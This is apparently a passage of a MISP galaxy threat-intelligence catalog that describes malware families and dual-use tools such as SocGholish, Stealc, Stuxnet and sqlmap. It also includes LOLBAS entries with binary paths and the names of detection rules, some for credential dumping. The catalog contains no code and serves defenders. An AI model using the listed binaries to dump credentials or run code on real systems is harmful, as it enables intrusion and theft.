tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[Morphisec Snip3 May 2021][Telefonica Snip3 December 2021]
Internal MISP references
UUID f587dc27-92be-5894-a4a8-d6c8bbcf8ede
which can be used as unique global reference for Snip3
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1086 |
source | MITRE |
type | ['malware'] |
SNUGRIDE
SNUGRIDE is a backdoor that has been used by menuPass as first stage malware. [FireEye APT10 April 2017]
Internal MISP references
UUID d6c24f7c-fe79-4094-8f3c-68c4446ae4c7
which can be used as unique global reference for SNUGRIDE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0159 |
source | MITRE |
type | ['malware'] |
SocGholish
SocGholish is a JavaScript-based loader malware that has been used since at least 2017. It has been observed in use against multiple sectors globally for initial access, primarily through drive-by-downloads masquerading as software updates. SocGholish is operated by Mustard Tempest and its access has been sold to groups including Indrik Spider for downloading secondary RAT and ransomware payloads.[SentinelOne SocGholish Infrastructure November 2022][SocGholish-update][Red Canary SocGholish March 2024][Secureworks Gold Prelude Profile]
Internal MISP references
UUID ab84f259-9b9a-51d8-a68a-2bcd7512d760
which can be used as unique global reference for SocGholish
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1124 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Socksbot
Socksbot is a backdoor that abuses Socket Secure (SOCKS) proxies. [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID c1906bb6-0b5b-4916-8b29-37f7e272f6b3
which can be used as unique global reference for Socksbot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0273 |
source | MITRE |
type | ['malware'] |
SodaMaster
SodaMaster is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]
Internal MISP references
UUID 6ecd970c-427b-4421-a831-69f46047d22a
which can be used as unique global reference for SodaMaster
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0627 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
SoftEther VPN
SoftEther VPN is an open-source software project that, according to its GitHub page, is "cross-platform multi-protocol VPN software".[GitHub SoftEtherVPN SoftEtherVPN_Stable] In August 2023, Microsoft researchers reported how Flax Typhoon, a nation-state-sponsored espionage group based in China, used SoftEther VPN as a key element of its command and control infrastructure during attacks on targets in Taiwan and elsewhere.[Microsoft Flax Typhoon August 24 2023]
Internal MISP references
UUID 46a9ee9c-6c4a-4db9-9385-46d2617d8050
which can be used as unique global reference for SoftEther VPN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S5305 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['tool'] |
SoftPerfect Network Scanner
SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 4272447f-8803-4947-b66f-051eecdd3385
which can be used as unique global reference for SoftPerfect Network Scanner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5008 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SombRAT
SombRAT is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including FIVEHANDS ransomware.[BlackBerry CostaRicto November 2020][FireEye FiveHands April 2021][CISA AR21-126A FIVEHANDS May 2021]
Internal MISP references
UUID 0ec24158-d5d7-4d2e-b5a5-bc862328a317
which can be used as unique global reference for SombRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0615 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
SoreFang
SoreFang is a first-stage downloader used by APT29 for exfiltration and to load other malware.[NCSC APT29 July 2020][CISA SoreFang July 2016]
Internal MISP references
UUID 3e959586-14ff-407b-a0d0-4e9580546f3f
which can be used as unique global reference for SoreFang
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0516 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
SOUNDBITE
SOUNDBITE is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID 069538a5-3cb8-4eb4-9fbb-83867bb4d826
which can be used as unique global reference for SOUNDBITE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0157 |
source | MITRE |
type | ['malware'] |
SPACESHIP
SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 0f8d0a73-9cd3-475a-b31b-d457278c921a
which can be used as unique global reference for SPACESHIP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0035 |
source | MITRE |
type | ['malware'] |
Spark
Spark is a Windows backdoor and has been in use since as early as 2017.[Unit42 Molerat Mar 2020]
Internal MISP references
UUID 93f8c180-6794-4e9c-b716-6b31f42eb72d
which can be used as unique global reference for Spark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0543 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
SpeakUp
SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [CheckPoint SpeakUp Feb 2019]
Internal MISP references
UUID b9b67878-4eb1-4a0b-9b36-a798881ed566
which can be used as unique global reference for SpeakUp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux'] |
software_attack_id | S0374 |
source | MITRE |
type | ['malware'] |
SpectralBlur
SpectralBlur is a malware targeting macOS systems that has backdoor functionality. Researchers have linked the malware to "TA444/Bluenoroff" actors.[Objective_See 1 4 2024]
Internal MISP references
UUID 89e2bdbf-4839-4b35-bd19-316a953d7acf
which can be used as unique global reference for SpectralBlur
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5311 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Sphynx
Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.[X-Force BlackCat May 30 2023] Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.[Microsoft Threat Intelligence Tweet August 17 2023]
Internal MISP references
UUID cdbebd0a-3036-4a24-b1d5-a3f0ca9c758e
which can be used as unique global reference for Sphynx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5055 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
SpicyOmelette
SpicyOmelette is a JavaScript-based remote access tool that has been used by Cobalt Group since at least 2018.[Secureworks GOLD KINGSWOOD September 2018]
Internal MISP references
UUID 2be9e22d-0af8-46f5-b30e-b3712ccf716d
which can be used as unique global reference for SpicyOmelette
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0646 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Splashtop
Splashtop is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID ecf8b878-19e5-425b-bc34-d5ed6e999fea
which can be used as unique global reference for Splashtop
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5009 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '9bc47297-864d-4f39-be37-ad9379102853', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
SplitLoader
SplitLoader is an intermediate-stage malware used by the North Korean threat actor Moonstone Sleet mainly for payload execution purposes. It is also capable of performing system reconnaissance.[Microsoft Security Blog 5 28 2024]
Internal MISP references
UUID 9a20c7f3-4e17-4a79-994a-c577afef5c72
which can be used as unique global reference for SplitLoader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5322 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
spwebmember
spwebmember is a Microsoft SharePoint enumeration and data dumping tool written in .NET. [NCC Group APT15 Alive and Strong]
Internal MISP references
UUID 0fdabff3-d996-493c-af67-f3ac02e4b00b
which can be used as unique global reference for spwebmember
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0227 |
source | MITRE |
tags | ['cd1b5d44-226e-4405-8985-800492cf2865', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Sqldumper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging utility included with Microsoft SQL.
Author: Oddvar Moe
Paths:
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
* C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
Resources:
* https://twitter.com/countuponsec/status/910969424215232518
* https://twitter.com/countuponsec/status/910977826853068800
* https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
Detection:
* Sigma: proc_creation_win_lolbin_susp_sqldumper_activity.yml
* Elastic: credential_access_lsass_memdump_file_created.toml
* Elastic: credential_access_cmdline_dump_tool.toml [Sqldumper.exe - LOLBAS Project]
Internal MISP references
UUID 146bd853-166b-4859-b4d7-b70f51bfd8e9
which can be used as unique global reference for Sqldumper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5235 |
source | Tidal Cyber |
tags | ['e992169d-832d-44e9-8218-0f4ab0ff72b4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
sqlmap
sqlmap is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. [sqlmap Introduction]
Internal MISP references
UUID 96c224a6-6ca4-4ac1-9990-d863ec5a317a
which can be used as unique global reference for sqlmap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0225 |
source | MITRE |
type | ['tool'] |
Sqlps
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are PowerShell v2. Microsoft SQL Server\120 and 130 are PowerShell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatibility reasons.
Author: Oddvar Moe
Paths:
* C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
* C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe
Resources:
* https://twitter.com/ManuelBerrueta/status/1527289261350760455
* https://twitter.com/bryon_/status/975835709587075072
* https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
Detection:
* Sigma: proc_creation_win_mssql_sqlps_susp_execution.yml
* Sigma: image_load_dll_system_management_automation_susp_load.yml
* Elastic: execution_suspicious_powershell_imgload.toml
* Splunk: 2021-10-05-suspicious_copy_on_system32.md [Sqlps.exe - LOLBAS Project]
Internal MISP references
UUID 5b3c03d3-9ea1-4322-a422-ab2401ffc294
which can be used as unique global reference for Sqlps
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5236 |
source | Tidal Cyber |
tags | ['da7e88fd-2d71-4928-81ce-e3d455b3d418', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SQLRat
SQLRat is malware that executes SQL scripts to avoid leaving traditional host artifacts. FIN7 has been observed using it.[Flashpoint FIN 7 March 2019]
Internal MISP references
UUID 612f780a-239a-4bd0-a29f-63beadf3ed22
which can be used as unique global reference for SQLRat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0390 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
SQLToolsPS
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft SQL that loads SQL Server cmdlets. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
Author: Oddvar Moe
Paths:
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Resources:
* https://twitter.com/pabraeken/status/993298228840992768
* https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
Detection:
* Sigma: proc_creation_win_mssql_sqltoolsps_susp_execution.yml
* Splunk: 2021-10-05-suspicious_copy_on_system32.md [SQLToolsPS.exe - LOLBAS Project]
Internal MISP references
UUID 9271e5cf-f788-4d7d-9c7a-8d5e37cbb9a6
which can be used as unique global reference for SQLToolsPS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5237 |
source | Tidal Cyber |
tags | ['f4867256-402a-4bcb-97d3-e071ee0993c1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Squirrel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: Reegun J (OCBC Bank) - @reegun21
Paths:
* %localappdata%\Microsoft\Teams\current\Squirrel.exe
Resources:
* https://www.youtube.com/watch?v=rOP3hnkj7ls
* https://twitter.com/reegun21/status/1144182772623269889
* http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
* https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
* https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
Detection:
* Sigma: proc_creation_win_lolbin_squirrel.yml [Squirrel.exe - LOLBAS Project]
Internal MISP references
UUID 13d5d060-8462-4592-8efb-2243fd2138d1
which can be used as unique global reference for Squirrel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5238 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Squirrelwaffle
Squirrelwaffle is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as Cobalt Strike and the QakBot banking trojan.[ZScaler Squirrelwaffle Sep 2021][Netskope Squirrelwaffle Oct 2021]
Internal MISP references
UUID 46943a69-0b19-4d3a-b2a3-1302e85239a3
which can be used as unique global reference for Squirrelwaffle
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1030 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
ssh
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Ssh.exe is the OpenSSH-compatible client that can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: Akshat Pradhan
Paths:
* c:\windows\system32\OpenSSH\ssh.exe
Resources:
* https://gtfobins.github.io/gtfobins/ssh/
Detection:
* Sigma: proc_creation_win_lolbin_ssh.yml
* IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
* IOC: command line arguments specifying execution. [ssh.exe - LOLBAS Project]
Internal MISP references
UUID 7b607493-5035-4e29-9f95-55362f53b805
which can be used as unique global reference for ssh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5164 |
source | Tidal Cyber |
tags | ['6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '64a55f86-15db-4599-b165-81be7f024397', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SslMM
SslMM is a full-featured backdoor used by Naikon that has multiple variants. [Baumgartner Naikon 2015]
Internal MISP references
UUID 3334a124-3e74-4a90-8ed1-55eea3274b19
which can be used as unique global reference for SslMM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0058 |
source | MITRE |
type | ['malware'] |
Starloader
Starloader is a loader component that has been observed loading Felismus and associated tools. [Symantec Sowbug Nov 2017]
Internal MISP references
UUID fc18e220-2200-4d70-a426-0700ba14c4c0
which can be used as unique global reference for Starloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0188 |
source | MITRE |
type | ['malware'] |
STARWHALE
STARWHALE is a Windows Script File (WSF) backdoor that has been used by MuddyWater, possibly since at least November 2021; there is also a STARWHALE variant written in Golang with similar capabilities. Security researchers have also noted the use of STARWHALE by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022][DHS CISA AA22-055A MuddyWater February 2022]
Internal MISP references
UUID 764c6121-2d15-4a10-ac53-b1c431dc8b47
which can be used as unique global reference for STARWHALE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1037 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
STEADYPULSE
STEADYPULSE is a web shell that infects targeted Pulse Secure VPN servers through modification of a legitimate Perl script; it was used as early as 2020, including in activity against US Defense Industrial Base (DIB) entities.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID ea561f0b-b891-5735-aa99-97cc8818fbef
which can be used as unique global reference for STEADYPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1112 |
source | MITRE |
type | ['malware'] |
Stealc
Stealc is a credential and information stealer first discovered by researchers in January 2023. Researchers assess the malware contains code similarities to prominent stealer families including Vidar, Raccoon, Mars, and RedLine.[Sekoia.io Stealc February 20 2023] Red Canary researchers indicated in July 2023 that they observed a "surge" of Stealc activity during the second half of the preceding month.[Red Canary Intelligence Insights July 20 2023]
Internal MISP references
UUID 7ae6b9f0-3a50-4ebc-ae2c-9569f00dbd81
which can be used as unique global reference for Stealc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5298 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
STEALDEAL
STEALDEAL is a relatively simple information and credential stealer that is known to be downloaded by RomCom malware and used to collect and exfiltrate victim data, including locally stored web browser credentials, cookies, and history.[Trend Micro Void Rabisu May 30 2023]
Internal MISP references
UUID 39aaa970-8c33-4fd3-a7f0-4b769f301460
which can be used as unique global reference for STEALDEAL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5296 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
StoneDrill
StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.[FireEye APT33 Sept 2017][Kaspersky StoneDrill 2017]
Internal MISP references
UUID 9eee52a2-5ac1-4561-826c-23ec7fbc7876
which can be used as unique global reference for StoneDrill
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0380 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
Stordiag
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Storage diagnostic tool
Author: Eral4m
Paths:
* c:\windows\system32\stordiag.exe
* c:\windows\syswow64\stordiag.exe
Resources:
* https://twitter.com/eral4m/status/1451112385041911809
Detection:
* Sigma: proc_creation_win_stordiag_susp_child_process.yml
* IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\ [Stordiag.exe - LOLBAS Project]
Internal MISP references
UUID 7430c53f-41a0-4395-88c7-fc2c34ee52c7
which can be used as unique global reference for Stordiag
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5165 |
source | Tidal Cyber |
tags | ['f0e3d6ea-d7ea-4d73-b868-1076fac744a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
StreamEx
StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. [Cylance Shell Crew Feb 2017]
Internal MISP references
UUID 502b490c-2067-40a4-8f73-7245d7910851
which can be used as unique global reference for StreamEx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0142 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
StrifeWater
StrifeWater is a remote-access tool that has been used by Moses Staff in the initial stages of their attacks since at least November 2021.[Cybereason StrifeWater Feb 2022]
Internal MISP references
UUID dd8bb0a3-6cb1-412d-adeb-cbaae98462a9
which can be used as unique global reference for StrifeWater
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1034 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
StrongPity
StrongPity is an information stealing malware used by PROMETHIUM.[Bitdefender StrongPity June 2020][Talos Promethium June 2020]
Internal MISP references
UUID ed563524-235e-4e06-8c69-3f9d8ddbfd8a
which can be used as unique global reference for StrongPity
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0491 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Stuxnet
Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011][CISA ICS Advisory ICSA-10-272-01][ESET Stuxnet Under the Microscope][Langer Stuxnet] Stuxnet was discovered in 2010, with some components being used as early as November 2008.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011]
Internal MISP references
UUID 3fdf3833-fca9-4414-8d2e-779dabc4ee31
which can be used as unique global reference for Stuxnet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0603 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', 'a98d7a43-f227-478e-81de-e7299639a355'] |
type | ['malware'] |
S-Type
S-Type is a backdoor that was used in Operation Dust Storm since at least 2013.[Cylance Dust Storm]
Internal MISP references
UUID b19b6c38-d38b-46f2-a535-d0bfc5790368
which can be used as unique global reference for S-Type
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0085 |
source | MITRE |
type | ['malware'] |
SUGARDUMP
SUGARDUMP is a proprietary browser credential harvesting tool that was used by UNC3890 during the C0010 campaign. The first known SUGARDUMP version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.[Mandiant UNC3890 Aug 2022]
Internal MISP references
UUID 6ff7bf2e-286c-4b1b-92a0-1e5322870c59
which can be used as unique global reference for SUGARDUMP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1042 |
source | MITRE |
type | ['malware'] |
SUGARUSH
SUGARUSH is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. SUGARUSH was first identified during analysis of UNC3890's C0010 campaign targeting Israeli companies, which began in late 2020.[Mandiant UNC3890 Aug 2022]
Internal MISP references
UUID 004c781a-3d7d-446b-9677-a042c8f6566e
which can be used as unique global reference for SUGARUSH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1049 |
source | MITRE |
type | ['malware'] |
SUNBURST
SUNBURST is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[SolarWinds Sunburst Sunspot Update January 2021][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID 6b04e98e-c541-4958-a8a5-d433e575ce78
which can be used as unique global reference for SUNBURST
